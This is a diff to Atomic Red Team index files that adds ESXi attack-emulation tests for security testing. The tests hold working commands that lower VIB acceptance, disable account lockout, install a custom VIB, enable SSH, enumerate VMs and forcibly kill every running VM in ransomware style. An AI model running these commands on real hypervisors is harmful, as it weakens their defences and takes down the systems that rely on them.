@@ -16777,7 +16777,7 @@ defense-evasion:
   T1562.010:
     technique:
       modified: '2023-10-03T16:40:15.445Z'
-      name: Downgrade Attack
+      name: 'Impair Defenses: Downgrade Attack'
       description: "Adversaries may downgrade or use a version of system features
         that may be outdated, vulnerable, and/or does not support updated security
         controls. Downgrade attacks typically take advantage of a system’s backward
@@ -16863,7 +16863,92 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-    atomic_tests: []
+      identifier: T1562.010
+    atomic_tests:
+    - name: ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI
+      auto_generated_guid: 062f92c9-28b1-4391-a5f8-9d8ca6852091
+      description: |
+        An adversary can change the VIB acceptance level to CommunitySupported to downgrade the acceptance criteria.This can be accomplished via PowerCLI. Afterwards an adversary may proceed to installing malicious VIBs on the host.
+        [Reference](https://www.mandiant.com/resources/blog/esxi-hypervisors-detection-hardening)
+      supported_platforms:
+      - linux
+      input_arguments:
+        vm_host:
+          description: Specify the host name of the ESXi Server
+          type: string
+          default: atomic.local
+        vm_user:
+          description: Specify the privilege user account on ESXi Server
+          type: string
+          default: root
+        vm_pass:
+          description: Specify the privilege user password on ESXi Server
+          type: string
+          default: pass
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Check if VMWARE PowerCLI PowerShell Module is installed.
+
+          '
+        prereq_command: |
+          $RequiredModule = Get-Module -Name VMware.PowerCLI -ListAvailable
+          if (-not $RequiredModule) {exit 1}
+        get_prereq_command: 'Install-Module -Name VMware.PowerCLI -Confirm:$false
+
+          '
+      executor:
+        command: "Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false
+          -Confirm:$false \nConnect-VIServer -Server #{vm_host} -User #{vm_user} -Password
+          #{vm_pass}\n(Get-EsxCli -VMHost #{vm_host} -V2).software.acceptance.set.Invoke(@{level
+          = \"CommunitySupported\"})\nDisconnect-VIServer -Confirm:$false\n"
+        name: powershell
+        elevation_required: true
+        atomic_tests: 
+    - name: ESXi - Change VIB acceptance level to CommunitySupported via ESXCLI
+      auto_generated_guid: 14d55b96-b2f5-428d-8fed-49dc4d9dd616
+      description: |
+        An adversary will change the VIB acceptance level to CommunitySupported to downgrade the acceptance criteria via ESXCLI. Afterwards an adversary may proceed to installing malicious VIBs on the host.
+        [Reference](https://www.mandiant.com/resources/blog/esxi-hypervisors-detection-hardening)
+      supported_platforms:
+      - linux
+      input_arguments:
+        vm_host:
+          description: Specify the host name of the ESXi Server
+          type: string
+          default: atomic.local
+        vm_user:
+          description: Specify the privilege user account on ESXi Server
+          type: string
+          default: root
+        vm_pass:
+          description: Specify the privilege user password on ESXi Server
+          type: string
+          default: pass
+        plink_file:
+          description: Path to plink
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+        cli_script:
+          description: Path to script with commands to change acceptance level
+          type: path
+          default: PathToAtomicsFolder\T1562.010\src\esx_community_supported.txt
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Check if plink is available.
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: 'echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw
+          "#{vm_pass}" -m "#{cli_script}"
+
+          '
+        name: command_prompt
   T1497:
     technique:
       x_mitre_platforms:
@@ -20641,6 +20726,46 @@ defense-evasion:
           -Value 1 \n"
         name: powershell
         elevation_required: true
+    - name: ESXi - Disable Account Lockout Policy via PowerCLI
+      auto_generated_guid: '091a6290-cd29-41cb-81ea-b12f133c66cb'
+      description: 'An adversary may disable account lockout policy within ESXi to
+        have the ability to prevent defensive actions from being enforced in the future
+        or to prevent future alerting.
+
+        '
+      supported_platforms:
+      - linux
+      input_arguments:
+        vm_host:
+          description: Specify the host name of the ESXi Server
+          type: string
+          default: atomic.local
+        vm_user:
+          description: Specify the privilege user account on ESXi Server
+          type: string
+          default: root
+        vm_pass:
+          description: Specify the privilege user password on ESXi Server
+          type: string
+          default: pass
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Check if VMWARE PowerCLI PowerShell Module is installed.
+
+          '
+        prereq_command: |
+          $RequiredModule = Get-Module -Name VMware.PowerCLI -ListAvailable
+          if (-not $RequiredModule) {exit 1}
+        get_prereq_command: 'Install-Module -Name VMware.PowerCLI -Confirm:$false
+
+          '
+      executor:
+        command: "Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false
+          -Confirm:$false \nConnect-VIServer -Server #{vm_host} -User #{vm_user} -Password
+          #{vm_pass}\nGet-AdvancedSetting -Entity #{vm_host} -Name 'Security.AccountLockFailures'
+          | Set-AdvancedSetting -Value '0' -Confirm:$false\nDisconnect-VIServer -Confirm:$false\n"
+        name: powershell
+        elevation_required: true
   T1601:
     technique:
       x_mitre_platforms:
@@ -47609,7 +47734,7 @@ execution:
   T1129:
     technique:
       modified: '2023-10-12T21:17:14.868Z'
-      name: Shared Modules
+      name: Server Software Component
       description: |-
         Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., [Native API](https://attack.mitre.org/techniques/T1106)).
 
@@ -47680,7 +47805,70 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-    atomic_tests: []
+      identifier: T1129
+    atomic_tests:
+    - name: ESXi - Install a custom VIB on an ESXi host
+      auto_generated_guid: 7f843046-abf2-443f-b880-07a83cf968ec
+      description: |
+        An adversary can maintain persistence within an ESXi host by installing malicious vSphere Installation Bundles (VIBs).
+        [Reference](https://www.mandiant.com/resources/blog/esxi-hypervisors-malware-persistence)
+      supported_platforms:
+      - windows
+      input_arguments:
+        vm_host:
+          description: Specify the host name of the ESXi Server
+          type: string
+          default: atomic.local
+        vm_user:
+          description: Specify the privilege user account on ESXi Server
+          type: string
+          default: root
+        vm_pass:
+          description: Specify the privilege user password on ESXi Server
+          type: string
+          default: pass
+        plink_file:
+          description: Path to plink
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+        pscp_file:
+          description: Path to Pscp
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\pscp.exe
+        vib_install:
+          description: Path to script with commands to install the vib
+          type: path
+          default: PathToAtomicsFolder\..\atomics\T1129\src\esxi_vibinstall.txt
+        vib_remove:
+          description: Path to script with commands to remove the vib
+          type: path
+          default: PathToAtomicsFolder\..\atomics\T1129\src\esxi_vibremove.txt
+        vib_file:
+          description: Path to the dummy vib
+          type: path
+          default: PathToAtomicsFolder\..\atomics\T1129\src\atomicvibes.vib
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Check if plink and pscp are available.
+
+          '
+        prereq_command: |
+          if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+          if (Test-Path "#{pscp_file}") {exit 0} else {exit 1}
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\plink.exe"
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/pscp.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\pscp.exe"
+      executor:
+        command: |
+          #{pscp_file} -pw #{vm_pass} #{vib_file} #{vm_user}@#{vm_host}:/tmp
+          echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{vib_install}"
+        cleanup_command: 'echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}"
+          -pw "#{vm_pass}" -m "#{vib_remove}"
+
+          '
+        name: command_prompt
+        elevation_required: false
   T1059.007:
     technique:
       x_mitre_platforms:
@@ -77884,7 +78072,7 @@ lateral-movement:
   T1021.004:
     technique:
       modified: '2023-08-11T20:24:03.069Z'
-      name: SSH
+      name: 'Remote Services: SSH'
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
 
@@ -77930,7 +78118,51 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-    atomic_tests: []
+      identifier: T1021.004
+    atomic_tests:
+    - name: ESXi - Enable SSH via PowerCLI
+      auto_generated_guid: 8f6c14d1-f13d-4616-b7fc-98cc69fe56ec
+      description: 'An adversary enables the SSH service on a ESXi host to maintain
+        persistent access to the host and to carryout subsequent operations.
+
+        '
+      supported_platforms:
+      - linux
+      input_arguments:
+        vm_host:
+          description: Specify the host name of the ESXi Server
+          type: string
+          default: atomic.local
+        vm_user:
+          description: Specify the privilege user account on ESXi Server
+          type: string
+          default: root
+        vm_pass:
+          description: Specify the privilege user password on ESXi Server
+          type: string
+          default: pass
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Check if VMWARE PowerCLI PowerShell Module is installed.
+
+          '
+        prereq_command: |
+          $RequiredModule = Get-Module -Name VMware.PowerCLI -ListAvailable
+          if (-not $RequiredModule) {exit 1}
+        get_prereq_command: 'Install-Module -Name VMware.PowerCLI
+
+          '
+      executor:
+        command: "Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false
+          -Confirm:$false \nConnect-VIServer -Server #{vm_host} -User #{vm_user} -Password
+          #{vm_pass}\nGet-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key
+          -eq \"TSM-SSH\" } | Start-VMHostService -Confirm:$false\n"
+        cleanup_command: "Set-PowerCLIConfiguration -InvalidCertificateAction Ignore
+          -ParticipateInCEIP:$false -Confirm:$false \nConnect-VIServer -Server #{vm_host}
+          -User #{vm_user} -Password #{vm_pass}\nGet-VMHostService -VMHost #{vm_host}
+          | Where-Object {$_.Key -eq \"TSM-SSH\" } | Stop-VMHostService -Confirm:$false\n"
+        name: powershell
+        elevation_required: true
   T1091:
     technique:
       modified: '2023-10-17T20:42:21.453Z'
@@ -94701,6 +94933,98 @@ discovery:
           reg query HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System /v SystemBiosVersion
           reg query HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System /v VideoBiosVersion
         name: command_prompt
+    - name: ESXi - VM Discovery using ESXCLI
+      auto_generated_guid: 2040405c-eea6-4c1c-aef3-c2acc430fac9
+      description: |
+        An adversary will using ESXCLI to enumerate the Virtual Machines on the host prior to executing power off routine.
+        [Reference](https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/)
+      supported_platforms:
+      - linux
+      input_arguments:
+        vm_host:
+          description: Specify the host name or IP of the ESXi Server
+          type: string
+          default: atomic.local
+        vm_user:
+          description: Specify the privilege user account on ESXi Server
+          type: string
+          default: root
+        vm_pass:
+          description: Specify the privilege user password on ESXi Server
+          type: string
+          default: pass
+        plink_file:
+          description: Path to Plink
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+        cli_script:
+          description: Path to file with discovery commands
+          type: path
+          default: PathToAtomicsFolder\T1082\src\esx_vmdiscovery.txt
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Check if plink is available.
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: 'echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw
+          "#{vm_pass}" -m "#{cli_script}"
+
+          '
+        name: command_prompt
+        elevation_required: false
+    - name: ESXi - Darkside system information discovery
+      auto_generated_guid: f89812e5-67d1-4f49-86fa-cbc6609ea86a
+      description: |
+        Darkside ransomware utilises various ESXCLI commands to obtain information about the ESXi Host.
+        [Reference](https://www.trendmicro.com/en_ph/research/21/e/darkside-linux-vms-targeted.html)
+      supported_platforms:
+      - linux
+      input_arguments:
+        vm_host:
+          description: Specify the host name or IP of the ESXi Server
+          type: string
+          default: atomic.local
+        vm_user:
+          description: Specify the privilege user account on ESXi Server
+          type: string
+          default: root
+        vm_pass:
+          description: Specify the privilege user password on ESXi Server
+          type: string
+          default: pass
+        plink_file:
+          description: Path to Plink
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+        cli_script:
+          description: Path to file containing darkside ransomware discovery commands
+          type: path
+          default: PathToAtomicsFolder\T1082\src\esx_darkside_discovery.txt
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Check if plink is available.
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: 'echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw
+          "#{vm_pass}" -m "#{cli_script}"
+
+          '
+        name: command_prompt
+        elevation_required: false
   T1016.002:
     technique:
       modified: '2023-10-05T11:35:30.887Z'
@@ -96191,6 +96515,52 @@ discovery:
           Start-Sleep -Second 4
           Stop-Process -Name "DirLister"
         name: powershell
+    - name: ESXi - Enumerate VMDKs available on an ESXi Host
+      auto_generated_guid: 4a233a40-caf7-4cf1-890a-c6331bbc72cf
+      description: |
+        An adversary uses the find command to enumerate vmdks on an ESXi host.
+        [Reference](https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/)
+      supported_platforms:
+      - linux
+      input_arguments:
+        vm_host:
+          description: Specify the host name of the ESXi Server
+          type: string
+          default: atomic.local
+        vm_user:
+          description: Specify the privilege user account on ESXi Server
+          type: string
+          default: root
+        vm_pass:
+          description: Specify the privilege user password on ESXi Server
+          type: string
+          default: pass
+        plink_file:
+          description: Path to Plink
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+        cli_script:
+          description: Path to script with file discovery commands
+          type: path
+          default: PathToAtomicsFolder\T1083\src\esxi_file_discovery.txt
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Check if plink is available.
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: 'echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw
+          "#{vm_pass}" -m "#{cli_script}"
+
+          '
+        name: command_prompt
+        elevation_required: false
   T1049:
     technique:
       modified: '2022-09-06T22:35:34.231Z'
@@ -107352,6 +107722,98 @@ impact:
         command: "shutdown /l \n"
         name: command_prompt
         elevation_required: true
+    - name: ESXi - Terminates VMs using pkill
+      auto_generated_guid: 987c9b4d-a637-42db-b1cb-e9e242c3991b
+      description: |
+        In VMWARE ESXi, process names starting with vmx are associated with running VMs. An adversary can use the pkill command to kill all processes with a prefix vmx.
+        [Reference](https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/)
+      supported_platforms:
+      - linux
+      input_arguments:
+        vm_host:
+          description: Specify the host name of the ESXi Server
+          type: string
+          default: atomic.local
+        vm_user:
+          description: Specify the privilege user account on ESXi Server
+          type: string
+          default: root
+        vm_pass:
+          description: Specify the privilege user password on ESXi Server
+          type: string
+          default: pass
+        plink_file:
+          description: Path to plink
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+        cli_script:
+          description: Path to text with commands
+          type: path
+          default: PathToAtomicsFolder\T1529\src\esx_pkill.txt
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Check if plink is available.
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: 'echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw
+          "#{vm_pass}" -m "#{cli_script}"
+
+          '
+        name: command_prompt
+        elevation_required: false
+    - name: ESXi - Avoslocker enumerates VMs and forcefully kills VMs
+      auto_generated_guid: 189f7d6e-9442-4160-9bc3-5e4104d93ece
+      description: |
+        Avoslocker malware has inbuilt functionality to enumerate the VM instances and uses the esxcli command to forcefully power off them.
+        [Reference](https://blogs.vmware.com/security/2022/02/avoslocker-modern-linux-ransomware-threats.html)
+      supported_platforms:
+      - linux
+      input_arguments:
+        vm_host:
+          description: Specify the host name of the ESXi Server
+          type: string
+          default: atomic.local
+        vm_user:
+          description: Specify the privilege user account on ESXi Server
+          type: string
+          default: root
+        vm_pass:
+          description: Specify the privilege user password on ESXi Server
+          type: string
+          default: pass
+        plink_file:
+          description: Path to plink
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+        cli_script:
+          description: Path to text with commands
+          type: path
+          default: PathToAtomicsFolder\T1529\src\esx_avoslocker_kill_vm.txt
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Check if plink is available.
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: 'echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw
+          "#{vm_pass}" -m "#{cli_script}"
+
+          '
+        name: command_prompt
+        elevation_required: false
 initial-access:
   T1133:
     technique:

atomics/Indexes/linux-index.yaml

@@ -9838,7 +9838,7 @@ defense-evasion:
   T1562.010:
     technique:
       modified: '2023-10-03T16:40:15.445Z'
-      name: Downgrade Attack
+      name: 'Impair Defenses: Downgrade Attack'
       description: "Adversaries may downgrade or use a version of system features
         that may be outdated, vulnerable, and/or does not support updated security
         controls. Downgrade attacks typically take advantage of a system’s backward
@@ -9924,7 +9924,92 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-    atomic_tests: []
+      identifier: T1562.010
+    atomic_tests:
+    - name: ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI
+      auto_generated_guid: 062f92c9-28b1-4391-a5f8-9d8ca6852091
+      description: |
+        An adversary can change the VIB acceptance level to CommunitySupported to downgrade the acceptance criteria.This can be accomplished via PowerCLI. Afterwards an adversary may proceed to installing malicious VIBs on the host.
+        [Reference](https://www.mandiant.com/resources/blog/esxi-hypervisors-detection-hardening)
+      supported_platforms:
+      - linux
+      input_arguments:
+        vm_host:
+          description: Specify the host name of the ESXi Server
+          type: string
+          default: atomic.local
+        vm_user:
+          description: Specify the privilege user account on ESXi Server
+          type: string
+          default: root
+        vm_pass:
+          description: Specify the privilege user password on ESXi Server
+          type: string
+          default: pass
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Check if VMWARE PowerCLI PowerShell Module is installed.
+
+          '
+        prereq_command: |
+          $RequiredModule = Get-Module -Name VMware.PowerCLI -ListAvailable
+          if (-not $RequiredModule) {exit 1}
+        get_prereq_command: 'Install-Module -Name VMware.PowerCLI -Confirm:$false
+
+          '
+      executor:
+        command: "Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false
+          -Confirm:$false \nConnect-VIServer -Server #{vm_host} -User #{vm_user} -Password
+          #{vm_pass}\n(Get-EsxCli -VMHost #{vm_host} -V2).software.acceptance.set.Invoke(@{level
+          = \"CommunitySupported\"})\nDisconnect-VIServer -Confirm:$false\n"
+        name: powershell
+        elevation_required: true
+        atomic_tests: 
+    - name: ESXi - Change VIB acceptance level to CommunitySupported via ESXCLI
+      auto_generated_guid: 14d55b96-b2f5-428d-8fed-49dc4d9dd616
+      description: |
+        An adversary will change the VIB acceptance level to CommunitySupported to downgrade the acceptance criteria via ESXCLI. Afterwards an adversary may proceed to installing malicious VIBs on the host.
+        [Reference](https://www.mandiant.com/resources/blog/esxi-hypervisors-detection-hardening)
+      supported_platforms:
+      - linux
+      input_arguments:
+        vm_host:
+          description: Specify the host name of the ESXi Server
+          type: string
+          default: atomic.local
+        vm_user:
+          description: Specify the privilege user account on ESXi Server
+          type: string
+          default: root
+        vm_pass:
+          description: Specify the privilege user password on ESXi Server
+          type: string
+          default: pass
+        plink_file:
+          description: Path to plink
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+        cli_script:
+          description: Path to script with commands to change acceptance level
+          type: path
+          default: PathToAtomicsFolder\T1562.010\src\esx_community_supported.txt
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Check if plink is available.
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: 'echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw
+          "#{vm_pass}" -m "#{cli_script}"
+
+          '
+        name: command_prompt
   T1497:
     technique:
       x_mitre_platforms:
@@ -11737,6 +11822,46 @@ defense-evasion:
           '
         name: sh
         elevation_required: true
+    - name: ESXi - Disable Account Lockout Policy via PowerCLI
+      auto_generated_guid: '091a6290-cd29-41cb-81ea-b12f133c66cb'
+      description: 'An adversary may disable account lockout policy within ESXi to
+        have the ability to prevent defensive actions from being enforced in the future
+        or to prevent future alerting.
+
+        '
+      supported_platforms:
+      - linux
+      input_arguments:
+        vm_host:
+          description: Specify the host name of the ESXi Server
+          type: string
+          default: atomic.local
+        vm_user:
+          description: Specify the privilege user account on ESXi Server
+          type: string
+          default: root
+        vm_pass:
+          description: Specify the privilege user password on ESXi Server
+          type: string
+          default: pass
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Check if VMWARE PowerCLI PowerShell Module is installed.
+
+          '
+        prereq_command: |
+          $RequiredModule = Get-Module -Name VMware.PowerCLI -ListAvailable
+          if (-not $RequiredModule) {exit 1}
+        get_prereq_command: 'Install-Module -Name VMware.PowerCLI -Confirm:$false
+
+          '
+      executor:
+        command: "Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false
+          -Confirm:$false \nConnect-VIServer -Server #{vm_host} -User #{vm_user} -Password
+          #{vm_pass}\nGet-AdvancedSetting -Entity #{vm_host} -Name 'Security.AccountLockFailures'
+          | Set-AdvancedSetting -Value '0' -Confirm:$false\nDisconnect-VIServer -Confirm:$false\n"
+        name: powershell
+        elevation_required: true
   T1601:
     technique:
       x_mitre_platforms:
@@ -27782,7 +27907,7 @@ execution:
   T1129:
     technique:
       modified: '2023-10-12T21:17:14.868Z'
-      name: Shared Modules
+      name: Server Software Component
       description: |-
         Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., [Native API](https://attack.mitre.org/techniques/T1106)).
 
@@ -27853,6 +27978,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1129
     atomic_tests: []
   T1059.007:
     technique:
@@ -47241,7 +47367,7 @@ lateral-movement:
   T1021.004:
     technique:
       modified: '2023-08-11T20:24:03.069Z'
-      name: SSH
+      name: 'Remote Services: SSH'
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
 
@@ -47287,7 +47413,51 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-    atomic_tests: []
+      identifier: T1021.004
+    atomic_tests:
+    - name: ESXi - Enable SSH via PowerCLI
+      auto_generated_guid: 8f6c14d1-f13d-4616-b7fc-98cc69fe56ec
+      description: 'An adversary enables the SSH service on a ESXi host to maintain
+        persistent access to the host and to carryout subsequent operations.
+
+        '
+      supported_platforms:
+      - linux
+      input_arguments:
+        vm_host:
+          description: Specify the host name of the ESXi Server
+          type: string
+          default: atomic.local
+        vm_user:
+          description: Specify the privilege user account on ESXi Server
+          type: string
+          default: root
+        vm_pass:
+          description: Specify the privilege user password on ESXi Server
+          type: string
+          default: pass
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Check if VMWARE PowerCLI PowerShell Module is installed.
+
+          '
+        prereq_command: |
+          $RequiredModule = Get-Module -Name VMware.PowerCLI -ListAvailable
+          if (-not $RequiredModule) {exit 1}
+        get_prereq_command: 'Install-Module -Name VMware.PowerCLI
+
+          '
+      executor:
+        command: "Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false
+          -Confirm:$false \nConnect-VIServer -Server #{vm_host} -User #{vm_user} -Password
+          #{vm_pass}\nGet-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key
+          -eq \"TSM-SSH\" } | Start-VMHostService -Confirm:$false\n"
+        cleanup_command: "Set-PowerCLIConfiguration -InvalidCertificateAction Ignore
+          -ParticipateInCEIP:$false -Confirm:$false \nConnect-VIServer -Server #{vm_host}
+          -User #{vm_user} -Password #{vm_pass}\nGet-VMHostService -VMHost #{vm_host}
+          | Where-Object {$_.Key -eq \"TSM-SSH\" } | Stop-VMHostService -Confirm:$false\n"
+        name: powershell
+        elevation_required: true
   T1091:
     technique:
       modified: '2023-10-17T20:42:21.453Z'
@@ -57053,6 +57223,98 @@ discovery:
           kldstat
           kldstat | grep vmm
         name: sh
+    - name: ESXi - VM Discovery using ESXCLI
+      auto_generated_guid: 2040405c-eea6-4c1c-aef3-c2acc430fac9
+      description: |
+        An adversary will using ESXCLI to enumerate the Virtual Machines on the host prior to executing power off routine.
+        [Reference](https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/)
+      supported_platforms:
+      - linux
+      input_arguments:
+        vm_host:
+          description: Specify the host name or IP of the ESXi Server
+          type: string
+          default: atomic.local
+        vm_user:
+          description: Specify the privilege user account on ESXi Server
+          type: string
+          default: root
+        vm_pass:
+          description: Specify the privilege user password on ESXi Server
+          type: string
+          default: pass
+        plink_file:
+          description: Path to Plink
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+        cli_script:
+          description: Path to file with discovery commands
+          type: path
+          default: PathToAtomicsFolder\T1082\src\esx_vmdiscovery.txt
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Check if plink is available.
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: 'echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw
+          "#{vm_pass}" -m "#{cli_script}"
+
+          '
+        name: command_prompt
+        elevation_required: false
+    - name: ESXi - Darkside system information discovery
+      auto_generated_guid: f89812e5-67d1-4f49-86fa-cbc6609ea86a
+      description: |
+        Darkside ransomware utilises various ESXCLI commands to obtain information about the ESXi Host.
+        [Reference](https://www.trendmicro.com/en_ph/research/21/e/darkside-linux-vms-targeted.html)
+      supported_platforms:
+      - linux
+      input_arguments:
+        vm_host:
+          description: Specify the host name or IP of the ESXi Server
+          type: string
+          default: atomic.local
+        vm_user:
+          description: Specify the privilege user account on ESXi Server
+          type: string
+          default: root
+        vm_pass:
+          description: Specify the privilege user password on ESXi Server
+          type: string
+          default: pass
+        plink_file:
+          description: Path to Plink
+          type: path
